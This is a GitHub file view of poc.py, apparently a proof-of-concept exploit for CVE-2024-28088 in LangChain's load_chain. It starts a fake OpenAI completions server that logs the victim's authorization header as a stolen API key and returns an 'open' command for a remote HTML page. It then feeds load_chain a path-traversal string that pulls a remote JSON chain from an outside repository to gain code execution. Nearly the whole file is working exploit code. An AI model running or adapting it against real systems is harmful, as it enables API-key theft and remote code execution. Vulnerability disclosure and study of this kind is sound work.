-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathpoc.py
40 lines (30 loc) · 1.03 KB
/
poc.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
import os
from langchain.chains import load_chain
from flask import Flask, request
import threading
app = Flask(__name__)
@app.route("/completions", methods=["POST"])
def get_completions():
print("\t[+] Received interaction!")
print("\t[++] Stole OpenAI api key:", request.headers.get("authorization"))
# Sending a JSON response
print("\t[++] Spawning shell...")
return {
"choices": [
{
"text": "open https://raw.githubusercontent.com/levpachmanov/cve-2024-28088-poc/main/pwnd.html"
}
],
"usage": "PINKDRACONIAN",
}
def run_server():
t = threading.Thread(target=app.run, kwargs={"host": "0.0.0.0", "port": "8000"})
t.start()
t.join()
thrd1 = threading.Thread(target=run_server, args=[])
thrd1.start()
os.environ["OPENAI_API_KEY"] = "SECRET_TOKEN"
malicious_path = "lc@ANYTHING://chains/../../../../../../../../../levpachmanov/cve-2024-28088-poc/main/poc_rce.json"
chain = load_chain(malicious_path)
print(chain.invoke("ANYTHING"))
thrd1.join()